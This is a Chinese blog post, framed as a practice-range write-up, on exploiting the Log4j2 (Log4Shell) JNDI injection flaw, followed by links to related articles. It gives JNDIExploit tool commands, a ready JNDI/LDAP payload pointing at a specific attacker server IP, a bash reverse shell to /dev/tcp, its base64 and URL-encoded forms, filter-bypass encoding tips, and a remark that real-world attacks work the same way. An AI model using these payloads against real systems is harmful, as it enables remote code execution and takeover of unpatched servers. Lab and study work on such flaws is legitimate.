log4j2实战复现

最新推荐文章于 2024-09-04 21:10:51 发布
最新推荐文章于 2024-09-04 21:10:51 发布
阅读量4.6k 收藏 3
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41860201/article/details/122876693
版权

去年爆出的log4j2漏洞,写一个实战利用的复现笔记,找了几个靶场作为复现靶机。

一、靶场地址:https://hack.zkaq.cn/battle/target?id=5a768e0ca6938ffd

靶场环境:

环境是:
SpringBoot版本 2.6.1 log4j版本 2.14.1

java8

  1. 先抓个登录包,看一下参数

 

 username和password参数中尝试jndi注入

2、用自己的vps开启ldap和web服务,这里直接使用工具JNDIExploit.v1.2

下载地址:GitHub - black9/Log4shell_JNDIExploit: Among the existing Log4shell practice materials JNDIExploit v1.2

 3、启用工具

java -jar JNDIExploit-1.2-SNAPSHOT.jar -u 查看payload

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 【vps ip】 开启LDAP和http服务

 

4、使用tomcatbypass base64加密payload

${JNDI:ldap://39.106.216.88:1389/TomcatBypass/Command/Base64/【反弹shell】

这里反弹shell需要编码绕过

这里我先将反弹shell进行了url编码,再base64编码,最后将payload整体url编码

最后得出payload

%24%7b%4a%4e%44%49%3a%6c%64%61%70%3a%2f%2f%33%39%2e%31%30%36%2e%32%31%36%2e%38%38%3a%31%33%38%39%2f%54%6f%6d%63%61%74%42%79%70%61%73%73%2f%43%6f%6d%6d%61%6e%64%2f%42%61%73%65%36%34%2f%59%6d%46%7a%61%43%41%74%61%53%41%25%32%42%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%7a%4f%53%34%78%4d%44%59%75%4d%6a%45%32%4c%6a%67%34%4c%7a%55%77%4d%44%55%77%49%44%41%25%32%42%4a%6a%45%25%33%44%7d

反弹shell为bash -i >& /dev/tcp/【vps ip】/50050 0>&1}

(YmFzaCAtaSA%2BJiAvZGV2L3RjcC8zOS4xMDYuMjE2Ljg4LzUwMDUwIDA%2BJjE%3D为base64编码后的反弹shell)

5、监听payload中写的50050端口

 

6、写入参数中

 发现反弹shell成功

 Flag就在根目录。

实战中方法跟靶场一样,其他靶场就不再赘述了,失败的话一般注意以下几点:

1、payload可以换几个试试一般常用的是

ldap://null:1389/Basic/Command/Base64/[base64_encoded_cmd]和ldap://null:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]

2、注意反弹shell的payload被过滤,可以尝试编码绕过。

3、确保自己的ldap服务和http服务网络可达。

4、注意哪些参数是注入点

 

 

自愚自乐__
关注
Log4j2 漏洞检测工具清单
01-17 1万+
距离Log4j2漏洞公开已经过去一个月了,它所造成的严重影响已经不需要我们重复提及了。随着时间的推移,新的漏洞会不断出现,旧的漏洞会不断消失,而这个Log4j2中的RCE漏洞可能需要好几年...
【漏洞复现】Apache Log4j2 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
07-20 971
ApacheLog4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。......
【中间件安全Tomcat 安全加固规范
12-14 6913
1. 适用情况 适用于使用Tomcat进行部署的Web网站。 2. 技能要求 熟悉Tomcat配置操作,能够利用Tomcat进行建站,并能针对站点使用Tomcat进行安全加固。 3. 前置条件 1、根据站点开放端口,进程ID,进程名称,确认站点采用Tomcat进行部署; 2、找到Tomcat路径: 方法一:开始->所有程序->Apache Tomcat->打开文件位...
log4j漏洞原理以及复现
最新发布
weixin_67840381的博客
09-04 877
kali:192.168.222.165 本机:192.168.225.18。
log4j2使用实战
恐龙弟旺仔的博客
05-08 674
前言: 今天完成最后一篇文章的介绍,也就是我们的log4j2log4j2的优点笔者就不再介绍了,网上一大堆相关文章。简单粗暴点,我们直接上使用。 1.log4j2单独使用实战 1.1 引入maven依赖 <!-- log4j2 依赖 --> <dependency> <groupId>org.apache.logging.log4j</groupId> <
Log4j2 最佳实践
shizihao1996的博客
07-01 1150
log4j高性能最佳实践
log4j2复现(小宇特详解)
小宇的web博客
02-19 803
log4j2复现(小宇特详解) 简介 ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。 漏洞概述 该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。 log4j2是调用了jndi来查询一些信息然后记录到了日志里面。 jndi是java一套资源和使用的接口,用来将各种资源做整合 idap是一种文件访问协议,用来获取文件资源 rmi是远程方法执行,是RPC的纯java实现方
log4j2 入门学习与总结
蜂族的专栏
06-20 9549
log4j2 学习与总结大纲: log4j2 配置文件加载 log4j2 配置文件结构图 log4j2 配置文件说明 log4j2 Appenders.child.Filter.ThresholdFilter 的使用 log4j2 logger 加载规则 目录log4j2 学习与总结 大纲 目录 一log4j2 配置文件加载 二log4j2 配置文件结构图 三log4j2 配置文件说明 四log4j
Log4j2漏洞复现
weixin_51519028的博客
08-12 1万+
Apache Log4j2是 Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......
log4j2_rce 项目
02-23
《深入理解Log4j2 RCE漏洞:从概念到实战》 在信息技术领域,安全问题始终是关注的焦点。本文将深入探讨一个重要的安全漏洞——Log4j2远程代码执行(RCE)漏洞,该漏洞曾引起全球广泛关注。我们将从项目标题"Log4j2...
log4J2靶机搭建和漏洞复现
qq_34415266的博客
01-16 5083
log4J2漏洞的靶机搭建和攻击复现详细过程
JNDIExploit-1.2-SNAPSHOT
03-20
JNDIExploit-1.2-SNAPSHOT
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
2301_79054215的博客
04-13 1116
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
log4j2远程代码执行RCE漏洞复现(CVE-2021-44228)
m0_57379855的博客
03-06 617
RCE远程代码执行漏洞复现log4jLog4jLDAPJNDIJNDI注入漏洞流程Log4j影响范围和排查方法修复漏洞 Log4j Log for Java,Apach的开源日志记录组件,使用非常广泛 使用方法: 1.pom引入依赖 2.获得logger实例 3.logger.info() debug() error() warn() LDAP lightweight directory access protocol轻量级目录访问协议(目录服务)默认端口389 可以批量登录 JNDI LDAP目录服务,R
log4j2漏洞复现
qq_45396375的博客
12-26 540
如果攻击者通过构造一个恶意的rmi或ldap服务,使Log4j通过JNDI加载远程恶意资源,就可能导致攻击者在目标系统上执行任意代码。补充:攻击机的jdk版本如果太高可能会不成功,如果攻击机选择使用kali,kali里的jdk版本太高,rmi协议可能不成功,可以换ldap协议试一下。JNDI注入工具下载地址:https://github.com/welk1n/JNDI-Injection-Exploit。靶机为自己写的一个springboot demo。将项目打包成一个jar包,上传至一台服务器。
Apache Log4j2代码执行漏洞复现(cve-2021-44228)
Bird&Bird
12-14 9684
目录一、漏洞描述二、影响范围三、漏洞复现1、创建一个maven项目,并导入log4j的依赖包2、编写POC3、编写恶意类4、起http服务5、编译并开启LDAP服务6、运行POC四、反弹shell1、靶场搭建2、访问漏洞环境,环境部署成功3、起RMI和Ldap服务4、开启nc监听5、火狐浏览器进行验证6、反弹shell成功 一、漏洞描述 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详
log4j2漏洞复现与利用】
热门推荐
一个程序员
01-31 4万+
log4j2
浅谈Log4j2信息泄露与不出网回显
zhoufy的博客
07-21 940
Log4j2
log4j2漏洞复现以及解决方案
学习不止境的博客
08-10 4538
log4j2漏洞解决 rmi远程调用 jndi注入 lookup
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值